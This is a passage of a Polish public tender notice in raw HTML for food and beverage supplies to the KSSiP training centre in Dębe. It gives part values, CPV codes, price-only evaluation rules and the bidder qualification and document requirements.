class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Sukcesywna dostawa przetworów warzywnych i owocowych dla KSSiP ośrodka szkoleniowego w Dębem. Opis przedmiotu zamówienia oraz warunki, sposób realizacji zamówienia został szczegółowo określony w załącznikach do SWZ: opis przedmiotu zamówienia (załącznik nr 2 SWZ), formularza asortymentowo- cenowy (załącznik nr 1 do formularza ofertowego) projektowanych postanowieniach umowy (załącznik nr 3 SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 10491,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15332291-0 - Dżem morelowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15331110-1 - Przetworzone warzywa korzeniowe</p> <p class="mb-0">15331120-4 - Przetworzone warzywa bulwiaste</p> <p class="mb-0">15331130-7 - Fasola, groch, papryki, pomidory i pozostałe warzywa</p> <p class="mb-0">15331142-4 - Kapusta przetworzona</p> <p class="mb-0">15331150-3 - Przetworzone jadalne części warzyw strączkowych</p> <p class="mb-0">15331400-1 - Warzywa konserwowane i/lub puszkowane</p> <p class="mb-0">15331420-7 - Pomidory konserwowane</p> <p class="mb-0">15331460-9 - Warzywa puszkowane</p> <p class="mb-0">15331462-3 - Groch puszkowany</p> <p class="mb-0">15331464-7 - Puszkowana cała fasola</p> <p class="mb-0">15331466-1 - Oliwki puszkowane</p> <p class="mb-0">15331500-2 - Warzywa konserwowane w occie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawcę wyjaśnień treści złożonych przez niego ofert.<br/>	Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Cena brutto zamówienia – 100 pkt [C]<br/>Wykonawca, który zaoferuje najniższą cenę za wykonanie zamówienia otrzyma 100,00 pkt, pozostali odpowiednio mniej wg wzoru:<br/><br/>(najniższa cena brutto )/(cena brutto oferty ocenianej) x 100,00 pkt=liczba punktów oferty ocenianej<br/><br/><br/>	Maksymalnie oferta w ramach każdej z części zamówienia może uzyskać 100 pkt.<br/>	Do oceny będą brane pod uwagę ceny oferty brutto.<br/>	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Sukcesywna dostawa świeżych owoców i warzyw dla KSSiP ośrodka szkoleniowego w Dębem. Opis przedmiotu zamówienia oraz warunki, sposób realizacji zamówienia został szczegółowo określony w załącznikach do SWZ: opis przedmiotu zamówienia (załącznik nr 2 SWZ), formularza asortymentowo- cenowy (załącznik nr 1 do formularza ofertowego) projektowanych postanowieniach umowy (załącznik nr 3 SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 59799,76 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15300000-1 - Owoce, warzywa i podobne produkty</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03212100-1 - Ziemniaki</p> <p class="mb-0">03212200-2 - Warzywa strączkowe suszone, łuskane</p> <p class="mb-0">03221110-0 - Warzywa korzeniowe</p> <p class="mb-0">03221200-8 - Warzywa owocowe</p> <p class="mb-0">03221300-9 - Warzywa liściaste</p> <p class="mb-0">03221340-1 - Szpinak</p> <p class="mb-0">03221400-0 - Warzywa kapustne</p> <p class="mb-0">03222110-7 - Owoce tropikalne</p> <p class="mb-0">03222200-5 - Owoce cytrusowe</p> <p class="mb-0">03222310-9 - Owoc jagody</p> <p class="mb-0">03222313-0 - Truskawki</p> <p class="mb-0">03222314-7 - Maliny</p> <p class="mb-0">03222320-2 - Jabłka, gruszki i pigwy</p> <p class="mb-0">03222330-5 - Owoce pestkowe</p> <p class="mb-0">03222340-8 - Winogrona</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawcę wyjaśnień treści złożonych przez niego ofert.<br/>	Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Cena brutto zamówienia – 100 pkt [C]<br/>Wykonawca, który zaoferuje najniższą cenę za wykonanie zamówienia otrzyma 100,00 pkt, pozostali odpowiednio mniej wg wzoru:<br/><br/>(najniższa cena brutto )/(cena brutto oferty ocenianej) x 100,00 pkt=liczba punktów oferty ocenianej<br/><br/><br/>	Maksymalnie oferta w ramach każdej z części zamówienia może uzyskać 100 pkt.<br/>	Do oceny będą brane pod uwagę ceny oferty brutto.<br/>	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Sukcesywna dostawa ryb przetworów rybnych dla KSSiP ośrodka szkoleniowego w Dębem. Opis przedmiotu zamówienia oraz warunki, sposób realizacji zamówienia został szczegółowo określony w załącznikach do SWZ: opis przedmiotu zamówienia (załącznik nr 2 SWZ), formularza asortymentowo- cenowy (załącznik nr 1 do formularza ofertowego) projektowanych postanowieniach umowy (załącznik nr 3 SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 18001,34 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15200000-0 - Ryby przetworzone i konserwowane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03310000-5 - Ryby, skorupiaki i produkty wodne</p> <p class="mb-0">03311000-2 - Ryby</p> <p class="mb-0">03311300-5 - Śledź</p> <p class="mb-0">03311400-6 - Tuńczyk</p> <p class="mb-0">03311700-9 - Łosoś</p> <p class="mb-0">03312000-9 - Skorupiaki</p> <p class="mb-0">15211000-0 - Filety rybne</p> <p class="mb-0">15220000-6 - Ryby mrożone, filety rybne i pozostałe mięso ryb</p> <p class="mb-0">15230000-9 - Ryby suszone lub solone; ryby w solance; ryby wędzone</p> <p class="mb-0">15241000-9 - Ryby w folii lub puszkowane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawcę wyjaśnień treści złożonych przez niego ofert.<br/>	Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Cena brutto zamówienia – 100 pkt [C]<br/>Wykonawca, który zaoferuje najniższą cenę za wykonanie zamówienia otrzyma 100,00 pkt, pozostali odpowiednio mniej wg wzoru:<br/><br/>(najniższa cena brutto )/(cena brutto oferty ocenianej) x 100,00 pkt=liczba punktów oferty ocenianej<br/><br/><br/>	Maksymalnie oferta w ramach każdej z części zamówienia może uzyskać 100 pkt.<br/>	Do oceny będą brane pod uwagę ceny oferty brutto.<br/>	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Sukcesywna dostawa mięsa i wędlin dla KSSiP ośrodka szkoleniowego <br/>w Dębem. Opis przedmiotu zamówienia oraz warunki, sposób realizacji zamówienia został szczegółowo określony w załącznikach do SWZ: opis przedmiotu zamówienia (załącznik nr 2 SWZ), formularza asortymentowo- cenowy (załącznik nr 1 do formularza ofertowego) projektowanych postanowieniach umowy (załącznik nr 3 SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 17217,92 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15111000-9 - Mięso wołowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15112000-6 - Drób</p> <p class="mb-0">15113000-3 - Wieprzowina</p> <p class="mb-0">15114000-0 - Podroby</p> <p class="mb-0">15131120-2 - Produkty wędliniarskie</p> <p class="mb-0">15131134-3 - Kaszanka i inne wędliny krwiste</p> <p class="mb-0">15131135-0 - Wędliny drobiowe</p> <p class="mb-0">15131200-7 - Mięso suszone, solone, wędzone lub marynowane</p> <p class="mb-0">15131400-9 - Produkty wieprzowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawcę wyjaśnień treści złożonych przez niego ofert.<br/>	Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Cena brutto zamówienia – 100 pkt [C]<br/>Wykonawca, który zaoferuje najniższą cenę za wykonanie zamówienia otrzyma 100,00 pkt, pozostali odpowiednio mniej wg wzoru:<br/><br/>(najniższa cena brutto )/(cena brutto oferty ocenianej) x 100,00 pkt=liczba punktów oferty ocenianej<br/><br/><br/>	Maksymalnie oferta w ramach każdej z części zamówienia może uzyskać 100 pkt.<br/>	Do oceny będą brane pod uwagę ceny oferty brutto.<br/>	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 10</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Sukcesywna dostawa jaj dla KSSiP ośrodka szkoleniowego w Dębem. Opis przedmiotu zamówienia oraz warunki, sposób realizacji zamówienia został szczegółowo określony w załącznikach do SWZ: opis przedmiotu zamówienia (załącznik nr 2 SWZ), formularza asortymentowo- cenowy (załącznik nr 1 do formularza ofertowego) projektowanych postanowieniach umowy (załącznik nr 3 SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 5340,45 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03142500-3 - Jaja</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawcę wyjaśnień treści złożonych przez niego ofert.<br/>	Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Cena brutto zamówienia – 100 pkt [C]<br/>Wykonawca, który zaoferuje najniższą cenę za wykonanie zamówienia otrzyma 100,00 pkt, pozostali odpowiednio mniej wg wzoru:<br/><br/>(najniższa cena brutto )/(cena brutto oferty ocenianej) x 100,00 pkt=liczba punktów oferty ocenianej<br/><br/><br/>	Maksymalnie oferta w ramach każdej z części zamówienia może uzyskać 100 pkt.<br/>	Do oceny będą brane pod uwagę ceny oferty brutto.<br/>	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 11</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Sukcesywna dostawa wody źródlanej gazowanej i niegazowanej dla KSSiP ośrodka szkoleniowego w Dębem. Opis przedmiotu zamówienia oraz warunki, sposób realizacji zamówienia został szczegółowo określony w załącznikach do SWZ: opis przedmiotu zamówienia (załącznik nr 2 SWZ), formularza asortymentowo- cenowy (załącznik nr 1 do formularza ofertowego) projektowanych postanowieniach umowy (załącznik nr 3 SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 24153,33 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15980000-1 - Napoje bezalkoholowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15981000-8 - Wody mineralne</p> <p class="mb-0">15981200-0 - Gazowane wody mineralne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawcę wyjaśnień treści złożonych przez niego ofert.<br/>	Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Cena brutto zamówienia – 100 pkt [C]<br/>Wykonawca, który zaoferuje najniższą cenę za wykonanie zamówienia otrzyma 100,00 pkt, pozostali odpowiednio mniej wg wzoru:<br/><br/>(najniższa cena brutto )/(cena brutto oferty ocenianej) x 100,00 pkt=liczba punktów oferty ocenianej<br/><br/><br/>	Maksymalnie oferta w ramach każdej z części zamówienia może uzyskać 100 pkt.<br/>	Do oceny będą brane pod uwagę ceny oferty brutto.<br/>	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 12</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Sukcesywna dostawa napojów gazowanych oraz soków owocowo – warzywnych dla KSSiP ośrodka szkoleniowego w Dębem. Opis przedmiotu zamówienia oraz warunki, sposób realizacji zamówienia został szczegółowo określony w załącznikach do SWZ: opis przedmiotu zamówienia (załącznik nr 2 SWZ), formularza asortymentowo- cenowy (załącznik nr 1 do formularza ofertowego) projektowanych postanowieniach umowy (załącznik nr 3 SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 5977,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15320000-7 - Soki owocowe i warzywne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15321000-4 - Soki owocowe</p> <p class="mb-0">15321100-5 - Sok pomarańczowy</p> <p class="mb-0">15321200-6 - Sok grejpfrutowy</p> <p class="mb-0">15321400-8 - Sok ananasowy</p> <p class="mb-0">15321600-0 - Sok jabłkowy</p> <p class="mb-0">15322000-1 - Soki warzywne</p> <p class="mb-0">15322100-2 - Sok pomidorowy</p> <p class="mb-0">15831500-7 - Syropy cukrowe</p> <p class="mb-0">15982000-5 - Napoje orzeźwiające</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawcę wyjaśnień treści złożonych przez niego ofert.<br/>	Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Cena brutto zamówienia – 100 pkt [C]<br/>Wykonawca, który zaoferuje najniższą cenę za wykonanie zamówienia otrzyma 100,00 pkt, pozostali odpowiednio mniej wg wzoru:<br/><br/>(najniższa cena brutto )/(cena brutto oferty ocenianej) x 100,00 pkt=liczba punktów oferty ocenianej<br/><br/><br/>	Maksymalnie oferta w ramach każdej z części zamówienia może uzyskać 100 pkt.<br/>	Do oceny będą brane pod uwagę ceny oferty brutto.<br/>	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 3.	Przedmiotowe środki dowodowe (jeśli dotyczy).<br/>W celu wykazania równoważności oferowanych produktów/rozwiązań zgodnie <br/>z zapisami Rozdziału 3 ust. 3 i 4 SWZ należy złożyć przedmiotowe środki dowodowe. Przedmiotowym środkiem dowodowymi będzie: informacja pochodząca od produ-centa np. opis produktu lub wydruk/ów ze stron internetowych producenta lub kar-ta katalogowa producenta lub opis/specyfikacja techniczna produktu lub inny przedmiotowy środek dowodowy, który wykaże równoważność oferowanego przez Wykonawcę produktu. Przedmiotowe środki dowodowe należy złożyć wyłącznie w przypadku oferowania produktów/rozwiązań równoważnych do wskazanych przez Zamawiającego w Opisie przedmiotu zamówienia - załącznik nr 2 do SWZ oraz w za-łączniku nr 1 do formularza ofertowego (formularz asortymentowo- cenowy, część 1 -12). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Wykonawca dołącza do oferty ( załącznik nr 1 do SWZ) oświadczenie, wg wzoru stanowiącego załącznik nr 4 do SWZ, o niepodleganiu wykluczeniu w zakresie wskazanym w rozdziale 6 SWZ. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia, na dzień składania ofert.<br/>1)	Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej tj. postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>2)	Oświadczenie składają odrębnie:<br/>a)	Wykonawca/każdy spośród Wykonawców wspólnie ubiegających <br/>się o udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia Wykonawcy.<br/><br/>2.	Przedmiotowe środki dowodowe (jeśli dotyczy).<br/>W celu wykazania równoważności oferowanych produktów/rozwiązań zgodnie <br/>z zapisami Rozdziału 3 ust. 3 i 4 SWZ należy złożyć przedmiotowe środki dowodowe. Przedmiotowym środkiem dowodowymi będzie: informacja pochodząca od producenta np. opis produktu lub wydruk/ów ze stron internetowych producenta lub karta katalogowa producenta lub opis/specyfikacja techniczna produktu lub inny przedmiotowy środek dowodowy, który wykaże równoważność oferowanego przez Wykonawcę produktu. Przedmiotowe środki dowodowe należy złożyć wyłącznie w przypadku oferowania produktów/rozwiązań równoważnych do wskazanych przez Zamawiającego w Opisie przedmiotu zamówienia - załącznik nr 2 do SWZ oraz w załączniku nr 1 do formularza ofertowego (formularz asortymentowo- cenowy, część 1 -12).<br/><br/>3.	Do oferty Wykonawca załącza również:<br/>1)	Dokumenty rejestrowe / pełnomocnictwo <br/>W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy <br/>jest umocowana do jego reprezentowania, Zamawiający wymaga <br/>od Wykonawcy złożenia wraz z ofertą odpisu lub informacji z Krajowego <br/>Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. Wykonawca nie jest zobowiązany do złożenia odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów. <br/><br/>a)	Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów <br/>rejestrowych, Wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa <br/>obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy. <br/><br/>b)	W przypadku Wykonawców ubiegających się wspólnie o udzielenie <br/>zamówienia Wykonawcy zobowiązani są do ustanowienia pełnomocnika. <br/>Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie <br/>do reprezentowania w postępowaniu o udzielenie zamówienia <br/>tych Wykonawców należy załączyć do oferty. <br/>Pełnomocnictwo powinno być załączone do oferty i powinno zawierać <br/>w szczególności wskazanie:<br/>-	postępowania o zamówienie publiczne, którego dotyczy,<br/>-	wszystkich Wykonawców ubiegających się wspólnie o udzielenie <br/>zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>-	ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>2)	Zastrzeżenie tajemnicy przedsiębiorstwa – w sytuacji, gdy oferta lub inne <br/>dokumenty składane w toku postępowania będą zawierały tajemnicę przedsiębiorstwa, Wykonawca, wraz z przekazaniem takich informacji, zastrzega, że nie mogą być one udostępniane, oraz wykazuje, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z 16 kwietnia 1993 r. <br/>o zwalczaniu nieuczciwej konkurencji. Wykonawca nie może zastrzec informacji, <br/>o których mowa w art. 222 ust. 5 ustawy Pzp, 3)	informacje o których mowa w Rozdziale 13 ust. 11 SWZ (jeśli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 3.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypad-ku Wykonawcy występujący wspólnie są zobowiązani 